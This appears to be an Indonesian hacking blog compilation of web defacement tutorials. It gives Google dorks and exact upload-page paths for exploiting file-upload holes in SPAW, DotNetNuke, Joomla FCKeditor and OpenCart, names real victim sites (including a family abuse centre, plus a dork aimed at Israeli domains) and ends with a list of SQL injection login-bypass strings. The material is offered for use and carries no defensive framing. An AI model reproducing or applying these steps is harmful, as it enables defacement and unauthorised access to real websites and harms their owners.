-
www.ziddu.com
silahkan Daftar -
www.ziddu.com
Silahkan Daftar
hahahaha........... asyik gk tu kalo kita Deface web dapet dollar????? kayaknya asyik dech...
ni perhatikan baik baik buat para defacer jangan marah ha.., menurut loe ada gk untungnya loe deface² selama ini...???? gk da kan... apa yang loe hasilkan hanya ngerusak website orang lain... mending kalo kita pelajarin dan dapet ilmu dari kerjaan yang kita lakukan itu, klo gk... kita ngerusak dan ngerusak terus menerus dengan membuat tampilan deface'an kita seindah / semenarik mungkin dengan membubuhi tulisan "hacked by ..." atau apalah itu.
hei bro buka mata & pikiran kalian, mending kalian hasilkan uang dari hobby loe tu... ini buka carding y, klo carding mah ane gak ngerti maklum newbie sejati....
lagian carding sekarang susah bisa² kalian pasan barang yang ngantarnya Interpol/FBI hiii takut, ane masih kuliah belum sarjana....ntar apa kata ortu gue.
ini mo ngomongin Deface web dapet dollar apa mo ngomongin carding......???? oia jadi lupa....
lanjut omz... ni ane baru kepikiran semalam gimana klo ane ambil sedikit keuntungan dari kesenangan gue deface daripada ane deface/ngerusak website orang gk da untungnya... kayaknya belum saatnya dech ane share tuturnya sekarang kayanya nunggu respond dulu dari orang² yang baca ini, lagi pula ane mo buat dulu tutorialnya.......
berikan respond anda dikolom komentar, apakah tutorial ini ane share atau gk?????
Ok kembali lagi bersama 70H4N 7M di Newbie Sejati, untuk membahas tutorial Spaw Upload Vulnerably / Spaw Editor Remote File Upload / Spaw File Manager.
tanpa basa-basi lagi langsung kita tancap gas, gak usah pake rem lagi......
Tutorial Spaw Upload Vulnerably
dork [ spaw2/dialogs/ ] dan
[ spaw2/uploads/files/ ]
pertama-tama langsung kita cari target dengan memasukkan salah satu dork diatas di mesin pencari (google)
klo udah dapat target misalkan http://www.simoncarves.com/admin/spaw2/uploads/files/SC.pdf
ganti spaw2/uploads/files/SC.pdf dengan spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files maka akan muncul tampilan halaman/ form buat upload File.
ganti lokasi penyimpanan / directory jadi files seperti gambar dibawah ini.
kalo sudah Upload Dech File kamu.........
Apabila Proses ulpoad udah selesai maka akan terlihat file kamu. untuk mengetahui lokasi file kamu klik file yang baru kamu uploadtrus lihat disebelah kanan. ada link download file. seperti gambar berikut
klik link tersebut. maka akan terlihat file hasil deface'an kamu. contoh http://www.simoncarves.com/admin/spaw2/uploads/files/ns.txt
selesai dech tuturial Spaw Upload Vulnerably........
sampai ketemu di postingan berikutnya......
Deface ala DotNetNuke. Sebelum kita mulai tutorial Deface ala DotNetNuke ini, mungkin di antara anda ada yang ber-tanya² apa itu DotNetNuke...??? bagi yang belum tahu silahkan baca Disini. udah taukan??? nah klo udah tau mari kita langsung operasi.
sebenarnya bugs ini termasuk bugs lama, tapi masih banyak yang guna'in web aplikasi ini.............
postingan ini buka yang pertama kali ane post. pertama kali ane post di Forum MEH kemudian digroup Facebook Blackbox Guardian Yang berganti Nama Jadi Red Alpha. Terus Di forum BCC nah yang ane disini kali keempat-nya. itung-itung buat nambah² archive Blog..hehehehehe
langsung saja
1. Sapkan file deface anda
contoh bisa di lihat di sini >> http://www.familyabusecenter.org/portals/0/70h4n-7m.txt
lalu save di notepad dengan nama file terserah anda contoh 70h4n-7m.txt
2.mencari target web
dork >> inurl:”/portals/0″
search di google...!!
3. jalankan aksi
setelah kita search digoole dan menemukan target
contoh >> http://www.familyabusecenter.org/portals/0/70h4n-7m.txt << Target sekarang ganti "portals/0/70h4n-7m.txt" dengan >> Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
hingga seperti ini >> http://www.familyabusecenter.org/Pro...nkgallery.aspx
Enter..!!
lalu klik/ceklist Link Type: >> File ( A File On Your Site )
setelah di klik atto ceklis,hapus link di URL...!!
http://www.familyabusecenter.org/Pro...nkgallery.aspx
/\
||
||
hapus semua..!!
lalu masukan ini di URL >> javascript:__doPostBack('ctlURL$cmdUpload','')
>>>ENTER..!!
lalu silahkan Upload dari kompi/PC anda file yg td di save contoh 70H4N-7M.txt
klik >> Upload Selected File
Catatan: Anda hanya dapat meng-upload type file:*. swf, *. jpg, *. jpeg, *. JPE, *. gif, *. bmp, *. png, *. doc, *. xls, *. ppt, *. pdf, *. txt, *. xml, *. xsl, *. css, *. zip, *. 3gp, *. asf, *. asx, *. avi, *. flv, *. m4v, *. mov, *. mp4, *. mpe, *. mpeg, *. mpg, *. ram, *. rm, *. rmvb, *. wm, *. wmv, *. vob
tetapi admin dapat mengubah ini
selesai upload nanti kelihatan di File Name contoh: 70H4N-7M.txt
untuk melihat hasilnya >> nama web/Portals/0/nama file
contoh >> http://www.familyabusecenter.org/portals/0/70h4n-7m.txt
Selesai dech........
dari tutor diatas silahkan di explore kemampuan anda
Selamat mencoba
Joomla mambots File Upload Vulnerability, hehehehe..... sorry y kalo judulnya agak aneh soalnya ane buat sendiri tu judul, habisnya gk tau apa nama teknik/ tutorial yang bakal ane jelasin ini.
Gk pake basa-basi lagi malas ane ngetik-nya lagi. lansung kita ke topik pembahasan....
- cari digoogle dengan dork inurl:index.php?option=com_content contoh ane dapet http://www.thomaskoetzing.de/index.php?option=com_content&task=view&id=57&Itemid=97
- kemudian hapus index.php?option=com_content&task=view&id=57&Itemid=97 ganti dengan mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?T
ype=File&Connector=connectors/php/connector.php maka jadiny http://www.thomaskoetzing.de/mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php akan muncul halaman/ form untuk upload file maukkan file deface anda. ingat type file yang bisa di upload berbeda-beda. nah disini ane cuma buat coba² jadi ane masukin file txt. - apabila selesai mengupload file maka file kita akan muncul di form/halam itu....
- untuk melihat dimana lokasi file kita dilettakan. blok dan klik kanan file yang barusan kita upload kemudian pilih View Selection Source, akan muncul seperti berikut

- Kurang lebih seperti itu tampilannya. kita lihat filenya ada di directory /File/ jadi letaknya ada di http://www.thomaskoetzing.de/File/70h4n.txt
Selesai dech tutorial Deface dengan Joomla mambots File Upload Vulnerability
Deface ala Opencart atau Opencart remote file Upload Vulnerability merupakan salah satu cara buat deface sebuah web yang support opencart, sebenarnya bugs ini termasuk bugs lama, namun berhubung banyaknya pertanyaan-pertanyaan yang masuk ke-saya melalui jejaring sosial sebut saja facebook. "Omz johan gimana sich deface menggunakan opencart...???" kurang lebih seperti itu pertanyaan yang masuk kesaya. ada juga yang lansung ngomong melalui chatroom "Om johan omz ajarin aku opencart donk" padahal duluan dia dibanding saya kenal dunia deface Sebut saja "DYAZ M.R" Sorry y omz Dyaz namanya ane masukin dipostingan ni...hehehehe.
Berhubung saya gk bisa merangkai kata² lg mending kita langsung aja y.................
Pertama-tama masukkan dork "Powered By OpenCart" di google anda bisa menambah Nama domain negara tujuan misalnya "Powered By OpenCart" site:il untuk negara Israel.
misalkan kita dapatkan http://emanuel-tehila.co.il/index.php?route=product/category&path=66_30_35. nah sepertinya OpenCart-nya ada di halaman awal. hapus index.php?route=product/category&path=66_30_35 ganti dengan admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
maka akan muncul halan untuk mengupload File kurang lebih seperti gambar dibawah ini tampilannya.

Disini kita gk bisa lansung upload File deface kita, kita musti ubah dulu connectornya jadi PHP dulu.

Sampai disini baru dah kita upluad file Deface-an kia contoh "703.html", apabila muncul pesan "File uploaded with no errors" berarti kita sukses mengupload file tadi. untuk hasilnya bisa ada di www.nama site.com/nama file.html contohnya http://emanuel-tehila.co.il/703.html
Selesai dech proses deface ala OpenCart. mohon koreksinya jika ada kekeliruan,
Konsep dasar SQL Injection | wah ini postingan pertama ane ni tentang hacking. bagi para mastah mohon koreksi ntambahanya.
Contoh : menggunakan injection string ’OR’’= pada username maupun password baik dilakukan dgn metode URL input query string maupun Box input query string maka SQL query akan membacanya sebagai berikut :
Maka yg terjadi adalah SQL query akan menyatakan blank username dan blank password sebagai user yg sah (valid). SQL Injection yg berhasil dilakukan akan ditandai dgn munculnya error page dgn error yg dimunculkan dapat berupa ODBC error, internal server error, syntax error dan lain sebagainya.
Ada banyak variasi dari injection string yg dapat digunakan untuk melakukan SQL Injection :
’or 1=1–
’or 0=0 –
’or ’x’=’x
’or a=a-
“or 0=0 –
“or 0=0 #
“or “x”=”x
“)or(”a”=”a
admin’–
hi” or 1=1 –
hi’ or’a’=’a
hi”)or(”a”=”a
or 0=0 #
’or a=a–
’or 0=0 #
’having 1=1–
“or 1=1–
“or “a”=”a
’)or(’a’=’a
’)or(’x’=’x
hi” or “a”=”a
hi’ or 1=1 –
hi’)or(’a’=’a
or 0=0 –
or 1=1–




